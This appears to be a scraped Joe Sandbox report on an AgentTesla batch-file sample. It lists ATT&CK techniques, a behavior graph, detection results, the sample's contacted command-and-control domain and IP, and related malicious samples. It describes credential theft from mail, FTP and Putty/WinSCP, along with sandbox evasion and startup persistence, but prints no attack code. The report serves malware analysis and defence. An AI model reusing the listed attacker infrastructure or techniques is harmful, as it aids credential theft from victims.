                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		11
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		2
                    Registry Run Keys / Startup Folder                    		2
                    Software Packing                    		NTDS421
                    Security Software Discovery                    		Distributed Component Object Model11
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    Process Discovery                    		SSHKeylogging12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials151
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Process Injection                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545585 Sample: 87M9Y3P4Z7.bat Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 48 nffplp.com 2->48 50 ip-api.com 2->50 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Yara detected AgentTesla 2->60 62 12 other signatures 2->62 9 cmd.exe 1 2->9         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 72 Uses cmd line tools excessively to alter registry or file data 9->72 14 87M9Y3P4Z7.bat.Zhe 18 9->14         started        18 xcopy.exe 2 9->18         started        20 conhost.exe 9->20         started        24 3 other processes 9->24 74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->74 22 cmd.exe 1 12->22         started        process6 file7 44 C:\Users\user\AppData\...\ChannelUris.vbs, ASCII 14->44 dropped 90 Drops VBS files to the startup folder 14->90 92 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->92 94 Powershell is started from unusual location (likely to bypass HIPS) 14->94 98 2 other signatures 14->98 26 InstallUtil.exe 15 2 14->26         started        46 C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, PE32 18->46 dropped 96 Uses cmd line tools excessively to alter registry or file data 22->96 30 ChannelUris.bat.Zhe 15 22->30         started        32 xcopy.exe 2 22->32         started        35 conhost.exe 22->35         started        37 3 other processes 22->37 signatures8 process9 dnsIp10 52 ip-api.com 208.95.112.1, 49737, 49822, 80 TUT-ASUS United States 26->52 54 nffplp.com 163.44.198.71, 49757, 49828, 587 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG Singapore 26->54 76 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 26->76 78 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->78 80 Tries to steal Mail credentials (via file / registry access) 26->80 82 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 26->82 84 Powershell is started from unusual location (likely to bypass HIPS) 30->84 86 Reads the Security eventlog 30->86 88 Reads the System eventlog 30->88 39 InstallUtil.exe 30->39         started        42 C:\Users\user\AppData\...\ChannelUris.bat.Zhe, PE32 32->42 dropped file11 signatures12 process13 signatures14 64 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 39->64 66 Tries to steal Mail credentials (via file / registry access) 39->66 68 Tries to harvest and steal ftp login credentials 39->68 70 2 other signatures 39->70

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    87M9Y3P4Z7.bat5%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe0%ReversingLabs
                    C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://crl.micro0%URL Reputationsafe
                    https://aka.ms/pscore6lB0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s-part-0017.t-0009.t-msedge.net
                    		13.107.246.45
                    		truefalse
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truetrue
                        		unknown
                        nffplp.com
                        		163.44.198.71
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://nffplp.comInstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://nuget.org/NuGet.exe87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000005908000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://stackoverflow.com/q/14436606/2335487M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://account.dyn.com/87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://github.com/mgravell/protobuf-netJ87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://ocsp.sectigo.com0InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/LicenseChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/IconChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/mgravell/protobuf-net87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://crt.sectigo.com/cPan/InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://github.com/Pester/PesterChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://github.com/mgravell/protobuf-neti87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://crl.micro87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2281586637.0000000006DD4000.00000004.00000020.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2281586637.0000000006D4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://aka.ms/pscore6lB87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000004FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://stackoverflow.com/q/11564914/23354;87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://stackoverflow.com/q/2152978/2335487M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://contoso.com/ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exe87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000005908000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://ip-api.comInstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              208.95.112.1
                                              		ip-api.comUnited States
                                              		53334TUT-ASUStrue
                                              163.44.198.71
                                              		nffplp.comSingapore
                                              		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1545585
                                              Start date and time:2024-10-30 17:40:10 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 37s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:23
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:87M9Y3P4Z7.bat
                                              renamed because original name is a hash value
                                              Original Sample Name:5be496e81c311cc8c78b7d6422fb51e4b4fc3e332ef54eae2bc6495dac60acc7.bat
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winBAT@31/9@4/2
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 95%
                                              • Number of executed functions: 452
                                              • Number of non-executed functions: 14
                                              Cookbook Comments:
                                              • Found application associated with file extension: .bat
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target ChannelUris.bat.Zhe, PID 4892 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: 87M9Y3P4Z7.bat

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              12:41:13API Interceptor18x Sleep call for process: 87M9Y3P4Z7.bat.Zhe modified
                                              12:41:17API Interceptor9437668x Sleep call for process: InstallUtil.exe modified
                                              12:41:28API Interceptor14x Sleep call for process: ChannelUris.bat.Zhe modified
                                              17:41:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              208.95.112.1wKj1CBkbos.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                              • ip-api.com/line/?fields=hosting
                                              skuld3.exeGet hashmaliciousSkuld StealerBrowse
                                              • ip-api.com/line/?fields=hosting
                                              FixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                              • ip-api.com/line/?fields=hosting
                                              file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                              • ip-api.com/line?fields=query,country
                                              Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • ip-api.com/line/?fields=hosting
                                              O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                              • ip-api.com/json/
                                              sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                              • ip-api.com/line/?fields=hosting
                                              Transferencia.docGet hashmaliciousQuasarBrowse
                                              • ip-api.com/json/
                                              SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                              • ip-api.com/json
                                              163.44.198.71nDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                                                IDR-500000000.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  Payment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                    Outward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                                      SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                                        US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                                          SecuriteInfo.com.Win32.PWSX-gen.17036.7156.exeGet hashmaliciousAgentTeslaBrowse
                                                            SecuriteInfo.com.Win32.PWSX-gen.25669.202.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              Commercial_Inv_and_PList.exeGet hashmaliciousAgentTeslaBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                nffplp.comnDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                IDR-500000000.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                Payment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                Outward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                SecuriteInfo.com.Win32.PWSX-gen.17036.7156.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                SecuriteInfo.com.Win32.PWSX-gen.25669.202.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 163.44.198.71
                                                                Commercial_Inv_and_PList.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                s-part-0017.t-0009.t-msedge.netphish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                • 13.107.246.45
                                                                https://schiller.life/Get hashmaliciousHTMLPhisherBrowse
                                                                • 13.107.246.45
                                                                https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9Get hashmaliciousUnknownBrowse
                                                                • 13.107.246.45
                                                                Derickdermatology.htmlGet hashmaliciousPhisherBrowse
                                                                • 13.107.246.45
                                                                https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.45
                                                                https://myworkspacec1d73.myclickfunnels.com/onlinereview--9cb35?preview=trueGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                • 13.107.246.45
                                                                Receipt.htmGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.45
                                                                weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                • 13.107.246.45
                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 13.107.246.45
                                                                https://www.guidedtrack.com/programs/n5snx1a/runGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.45
                                                                ip-api.comwKj1CBkbos.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                • 208.95.112.1
                                                                skuld3.exeGet hashmaliciousSkuld StealerBrowse
                                                                • 208.95.112.1
                                                                FixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                                • 208.95.112.1
                                                                file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                • 208.95.112.1
                                                                Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                • 208.95.112.1
                                                                bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                                                • 208.95.112.1
                                                                sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Transferencia.docGet hashmaliciousQuasarBrowse
                                                                • 208.95.112.1
                                                                https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/Get hashmaliciousUnknownBrowse
                                                                • 51.195.5.58

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGhttps://chilltalk.co.th/sg/societalgenerale/Get hashmaliciousUnknownBrowse
                                                                • 163.44.198.45
                                                                nDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                https://16883719-16-20211227182314.webstarterz.com/hdfckychdfclog/index.phpGet hashmaliciousUnknownBrowse
                                                                • 150.95.98.21
                                                                islHUvTZcI.exeGet hashmaliciousGuLoaderBrowse
                                                                • 118.27.130.234
                                                                islHUvTZcI.exeGet hashmaliciousGuLoaderBrowse
                                                                • 118.27.130.234
                                                                IDR-500000000.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                eCRzQywfQl.exeGet hashmaliciousGuLoaderBrowse
                                                                • 118.27.130.234
